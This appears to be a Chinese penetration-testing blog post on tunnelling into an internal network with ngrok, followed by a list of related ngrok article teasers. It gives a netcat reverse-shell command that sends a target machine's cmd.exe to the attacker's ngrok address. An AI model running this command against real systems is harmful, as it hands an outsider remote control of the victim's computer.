0X00 前言

在渗透测试过程中，可能目标主机是内网里面的机器，由于外网无法直接访问内网，我们就需要反向代理，来为下一步的工作做准备。

0X01 ngrok简介

ngrok是一个反向代理，通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。ngrok 可捕获和分析所有通道上的流量，便于后期分析和重放。

0X02 使用方法

先去官网注册一个账号，之后下载ngrok客户端，看你的主机是什么，我的是ubantu的。
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
./ngrok authtoken your authtoken
./ngrok help 查看使用帮助
./ngrok tcp 9998 获得一个地址，后面用nc发送目标的shell或者cmd就是用这个地址

ngrok

在目标机器执行
nc -vv yourserver port -e c:\Windows\System32\cmd.exe

ngrok

成功收到cmd

shell

sunny-ngrok 内网穿透
sunny-ngrok 内网穿透是基于 ngrok 的一个内网穿透服务，提供免费的用于开发的内网穿透隧道。接下来...
使用Ngrok实现内网穿透服务
# 使用Ngrok实现内网穿透服务 tags：网络 Linux ngrok ngrok是什么？ ngrok是一个...
Sunny-Ngrok实现自定义域名内网穿透
内网穿透 + Sunny-Ngrok + 自定义域名 1、内网穿透 1.1 内网IP：内网IP，过多官方的解释这里...
Ngrok服务端搭建
本文介绍Ngrok服务搭建。Ngrok和花生壳类似都是内网穿透工具，了解更多可以查看另外一篇专门介绍内网穿透工具的...
内网穿透 -ngrok
内网穿透 -ngrok 1.下载下载ngrok,我下载的是win64.zip下载地址：https://ngrok...
Ngrok内网穿透
为什么要用至于为什么要用内网穿透技术，网上一大堆，也有很多收费的网站进行内网穿透，比如花生壳等等。这里我们选择...
ngrok 内网穿透
第一个先下载ngrok 客户端下载地址： https://ngrok.com/download点击进去下面 ...
ngrok内网穿透
ngrok可以将本地项目映射到公网，以便外网环境的访问本地应用下载地址传送门使用方法启动ngrok.exe ...
ngrok内网穿透
0X00 前言在渗透测试过程中，可能目标主机是内网里面的机器，由于外网无法直接访问内网，我们就需要反向代理，来为...
内网穿透—ngrok
很多时候公司电脑是没有公网ip, 都连路由器去了.当我们在进行一些开发时候,比如,支付需要回调通知,就只能将代码拉...